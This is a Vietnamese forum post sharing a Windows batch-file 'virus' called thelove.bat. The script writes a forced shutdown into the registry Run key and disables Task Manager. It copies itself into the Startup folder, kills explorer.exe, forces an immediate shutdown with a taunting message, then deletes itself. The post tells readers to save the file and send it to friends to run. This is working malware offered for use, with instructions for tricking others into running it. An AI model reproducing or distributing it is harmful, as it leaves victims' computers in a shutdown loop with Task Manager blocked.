View Single Post
Tuổi 11-03-2010, 05:00 PM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Code Virus shutdown máy tính
Code Virus shutdown máy tính

Đây là code của 1 con virus làm Shutdown máy tính khi boot vào hệ thống windows





Chức năng của con virus này là:

- Đưa lệnh shutdown vào regedit
- Copy chạy vào phần startup của windows
- Sau khi thực thi xong virus này sẽ tự động biến mất khỏi máy tính

Trích dẫn:


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run" /v shutdown /t REG_SZ /d "shutdown.exe -f -s -t 05" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
cls
copy thelove.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
cls
taskkill /f /im explorer.exe
cls
shutdown.exe -f -s -t 05 -c "may cua ban da bi nhiem virus tinh yeu ..."
cls
@echo off
echo Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Bat Diet !!!!!!!!!
echo GOOD BYE SEE YOU AGAIN
pause
del thelove.bat

Cách sử dụng:

1. Copy đoạn code trên --> Paste vào trong Notepad và Save lại với tên: thelove.bat

2. Gửi file: thelove.bat cho bạn bè và vụ họ run file: thelove.bat



Chúc bạn thành công

  Trả lời ngay kèm theo trích dẫn này